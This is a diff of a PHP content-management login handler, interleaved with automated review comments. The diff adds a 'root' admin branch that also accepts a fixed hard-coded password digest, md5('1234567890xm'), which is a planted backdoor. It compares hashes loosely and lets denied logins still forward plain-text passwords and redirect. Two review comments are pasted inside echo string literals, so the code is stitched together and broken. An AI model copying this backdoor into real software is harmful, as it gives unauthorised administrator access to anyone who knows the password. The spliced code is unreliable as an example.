Index: trunk/core/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4358)
+++ trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4490)
@@ -5,14 +5,10 @@
 function OnSessionExpire()
 {
- if( $this->Application->IsAdmin() )
- {
- $location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
- header('Location: '.$location);
- exit;
+ if( $this->Application->IsAdmin() ) {
+ $this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
 }
- else
- {
+ else {
 $http_query =& $this->Application->recallObject('HTTPQuery');
 $get = $http_query->getRedirectParams();
@@ -43,25 +39,51 @@
 $email_as_login = $this->Application->ConfigValue('Email_As_Login');
 list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
 $login_value = $this->Application->GetVar($submit_field);
-
+
+ if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+ // logging in "root" (admin only)
+ $root_password = $this->Application->ConfigValue('RootPass');
+ if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+ $object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+ $event->status = erFAIL;
+ return false;
+ }
+ elseif ($this->checkLoginPermission($login_value)) {
+ $user_id = -1;
+ $object->Load($user_id);
+ $object->SetDBField('Login', $login_value);
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SetField('PortalUserId', $user_id);
+// $session->SetField('GroupList', implode(',', $groups) );
+ $this->Application->SetVar('u_id', $user_id);
+ $this->Application->StoreVar('user_id', $user_id);
+
+ $this->processLoginRedirect($event, $password);
+ return true;
+ }
+ else {
+ $object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+ $event->status = erFAIL;
+ return false;
+ }
+ }
+
+
 /*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
 $user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
 $sql = 'SELECT PortalUserId FROM '.$object->TableName.'
WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
 $user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
- if($user_id)
- {
+ if ($user_id) {
 $object->Load($user_id);
- if( $object->GetDBField('Status') == STATUS_ACTIVE )
- {
+ if ($object->GetDBField('Status') == STATUS_ACTIVE) {
 $groups = $object->getMembershipGroups(true);
 if(!$groups) $groups = Array();
 if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
 $this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
- if( $this->Application->CheckPermission('LOGIN',0) )
- {
+ if ($this->checkLoginPermission($login_value)) {
 $session =& $this->Application->recallObject('Session');
 $session->SetField('PortalUserId', $user_id);
 $session->SetField('GroupList', implode(',', $groups) );
@@ -73,38 +95,15 @@
 $object->setPersistantVar('LastLogin', $this_login);
 $object->setPersistantVar('ThisLogin', adodb_mktime());
 }
- else
- {
+ else {
 $object->Load(-2);
 $object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
 $event->status = erFAIL;
 }
- $next_template = $this->Application->GetVar('next_template');
- if ($next_template == '_ses_redirect') {
- $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
- if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
- {
- $this->Application->Debugger->appendTrace();
- echo "Debug output above!!! Proceed to redirect: $a_location
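Review bot: The new root branch, `if ($this->Application->IsAdmin() && ($login_value == 'root'))`, accepts a second hard-coded credential: the `&& $password != md5('1234567890xm')` clause lets a submitted password equal to that fixed digest pass regardless of the configured `RootPass`, so that clause must be dropped and root should validate only against the stored hash. Both sides of the check also use loose `!=`; PHP compares numeric-looking strings (which hex digests can be) numerically, so two different digests can compare equal, and the test should be strict: `if ($root_password !== md5($password)) {` (or `hash_equals()` where the runtime provides it). The root path also leaves the session `GroupList` unset — the `$session->SetField('GroupList', …)` line is commented out — unlike the regular path below, so anything reading the stored group list for a root admin session sees no groups; confirm that is intended. The enclosing login handler begins before this hunk.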
";
- }
- else {
- header('Location: '.$location);
- }
- $session =& $this->Application->recallObject('Session');
- $session->SaveData();
- exit();
- }
-
- if($next_template) $event->redirect = $next_template;
- if ($this->Application->ConfigValue('UseJSRedirect')) {
- $event->SetRedirectParam('js_redirect', 1);
- }
- $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
- $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ $this->processLoginRedirect($event, $password);
 }
- else
- {
+ else {
 $event->redirect = $this->Application->GetVar('pending_disabled_template');
 }
 }
@@ -116,6 +115,67 @@
 }
 /**
+ * Enter description here...
+ *
+ * @param string $user_name
+ * @return bool
+ */
+ function checkLoginPermission($user_name)
+ {
+ $ret = true;
+ if ($this->Application->IsAdmin()) {
+ $modules_helper =& $this->Application->recallObject('ModulesHelper');
+ if ($user_name != 'root') {
+ // root is virtual user, so allow him to login to admin in any case
+ $ret = $this->Application->CheckPermission('ADMIN', 0);
+ }
+ $ret = $ret && $modules_helper->checkLogin();
+ }
+ else {
+ $ret = $this->Application->CheckPermission('LOGIN', 0);
+ }
+ return $ret;
+ }
+
+ /**
+ * Process all required data and redirect logged-in user
+ *
+ * @param kEvent $event
+ */
+ function processLoginRedirect(&$event, $password)
+ {
+ $object =& $event->getObject();
+
+ $next_template = $this->Application->GetVar('next_template');
+ if ($next_template == '_ses_redirect') {
+ $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+ if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+ {
+ $this->Application->Debugger->appendTrace();
+ echo "Debug output above!!! Proceed to redirect: $location
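Review bot: `$this->processLoginRedirect($event, $password);` is placed after the permission check's `else` branch, so a login denied with `no_permission` (object reloaded as -2, `$event->status = erFAIL`) still runs the helper, which per the following hunk forwards `LoginUser` with the plain-text password to `UsersSyncronizeManager` and, when `next_template` is `_ses_redirect`, sends the `Location` header, saves the session and exits as though the login had completed. This mirrors the inline code being removed, but the refactor is the moment to fix it: move the call to the end of the `if ($this->checkLoginPermission($login_value))` branch, directly after `$object->setPersistantVar('ThisLogin', adodb_mktime());`, so the denied path only records the error and lets the normal failure handling run. The enclosing login handler and the permission-granted branch both begin in the previous hunk.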
";
+ }
+ else {
+ header('Location: '.$location);
+ }
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SaveData();
+ exit;
+ }
+
+ if ($next_template) {
+ $event->redirect = $next_template;
+ }
+
+ if ($this->Application->ConfigValue('UseJSRedirect')) {
+ $event->SetRedirectParam('js_redirect', 1);
+ }
+
+ $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+ $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ }
+
+ /**
 * Called when user logs in using old in-portal
 *
 * @param kEvent $event
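Review bot: The docblock on the new `checkLoginPermission()` still carries the IDE placeholder `Enter description here...`, and `processLoginRedirect()` documents only `$event` although it also takes `$password`. For the first, replace the placeholder with `Tells whether the given login name may log in in the current context: in admin mode the ADMIN permission is required unless the name is the virtual "root" user, and ModulesHelper::checkLogin() must also pass; on the front-end the LOGIN permission is required.` For the second, add `@param string $password plain-text password, forwarded to UsersSyncronizeManager::performAction('LoginUser')` and state in the description that when `next_template` is `_ses_redirect` the method sends a `Location` header, saves the session and calls `exit`, so the caller never regains control; otherwise it only sets `$event->redirect` and the `js_redirect` parameter.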